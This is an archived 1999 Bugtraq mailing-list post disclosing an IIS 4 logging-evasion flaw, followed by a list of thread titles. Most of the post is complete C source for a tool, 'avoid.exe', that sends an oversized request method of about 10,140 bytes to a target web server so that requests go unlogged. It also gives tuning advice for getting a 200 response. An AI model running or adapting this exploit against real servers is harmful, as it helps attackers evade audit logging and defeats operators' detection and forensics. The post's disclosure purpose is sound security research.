Bugtraq mailing list archives
Follow up - IIS 4 logging
From: mnemonix () GLOBALNET CO UK (mnemonix)
Date: Sat, 23 Jan 1999 15:52:02 -0000
There has been a mixed response to this problem - on some machines nothing is logged and the page is returned, others get a 500 error and others log the whole request.
From what I can make out:
Machines that first had IIS 3 then were upgraded to IIS 4 with the NT Option Pack and Service Pack 3 or 4 return the page and don't log. Here is the source for avoid.exe as many have asked for it - for those that get a 500 response back from the server play around with the request_method length by increasing it until you get a 200ok response. It will chop and change between 5xx, 4xx and 200 responses Cheers, David Litchfield http://www.infowar.co.uk/mnemonix -----------------------8<----------------------------------------------- /* Compile with eg Visual C++ and link with wsock32.lib #include <stdio.h> #include <winsock2.h> #include <string.h> int main (int argc, char *argv[]) { int snd, rcv, err, portno,a=0,b, res; char resp[1024]; WORD wVersionRequested; WSADATA wsaData; struct sockaddr_in sa; struct hostent *he; SOCKET sock; if (argc !=2) { printf("Usage:\nc:\\>%s target_machine\n\nDavid Litchfield\n21st January 1999\n", argv[0]); return 0; } wVersionRequested = MAKEWORD( 2, 0 ); err = WSAStartup( wVersionRequested, &wsaData ); if ( err != 0 ) { printf("No winsock.dll\n"); return 0; } if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 ) { printf("No winsock.dll - 2nd\n"); WSACleanup( ); return 0; } if ((he = gethostbyname(argv[1])) == NULL) { printf("Invalid Host\n"); return 0; } sock=socket(AF_INET,SOCK_STREAM,0); if (sock==INVALID_SOCKET) { printf("Invalid Socket!\n"); return 0; } else { printf(""); } sa.sin_addr.s_addr=INADDR_ANY; sa.sin_family=AF_INET; bind(sock,(struct sockaddr *)&sa,sizeof(sa)); sa.sin_port=htons(80); memcpy(&sa.sin_addr,he->h_addr,he->h_length); if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) < 0) { printf("Failed to connect!\n"); } else { /* This loop creates the REQUEST_METHOD and makes it 10140 bytes long while (a < 10141) { snd=send(sock,"A", 1, 0); a ++; } snd=send(sock," /default.asp HTTP/1.0\n\n",43,0); rcv=recv(sock,resp,256,0); printf("\n%s",resp); rcv=recv(sock,resp,1024,0); printf("\n%s\n\n",resp); } closesocket(sock); return 0; } ----------------------------->8--------------------------------------------- -------------------------
Current thread:
- Quake 2 Server Crash, (continued)
- Quake 2 Server Crash Leif Sawyer (Jan 20)
- NetBSD Security Advisory 1999-001: select(2)/accept(2) race D. J. Bernstein (Jan 20)
- Sendmail 8.8.x/8.9.x bugware Gregory Neil Shapiro (Jan 20)
- CFP: New Security Paradigms Workshop 1999 Crispin Cowan (Jan 21)
- Re: Sendmail 8.8.x/8.9.x bugware Phil Stracchino (Jan 21)
- Re: Sendmail 8.8.x/8.9.x bugware Phil Stracchino (Jan 21)
- linux crashes irix6.3 Philipp Schott (Jan 22)
- Re: linux crashes irix6.3 J.A. Gutierrez (Jan 23)
- CERT Advisory CA-99.01 - TCP.Wrappers (fwd) //Stany (Jan 22)
- Misleading CERT Advisory CA-99-01-Trojan-TCP-Wrappers Jochen Thomas Bauer (Jan 22)
- Follow up - IIS 4 logging mnemonix (Jan 23)
- WebRamp M3 remote network access bug John Stanley (Jan 21)
- Re: WebRamp M3 remote network access bug James Egelhof (Jan 21)
- Perl.exe and IIS security advisory mnemonix (Jan 22)
- Re: Perl.exe and IIS security advisory Tabor J. Wells (Jan 24)
- Repost: Wietse's FTP site has moved Wietse Venema (Jan 25)
- Using Example Domain Names in Exploits bandregg () REDHAT COM (Jan 25)
- IIS Advisory Update Marc (Jan 24)
- Re: backdoored tcp wrapper source code John Stange (Jan 23)
- SSH 1.x and 2.x Daemon KuRuPTioN (Jan 23)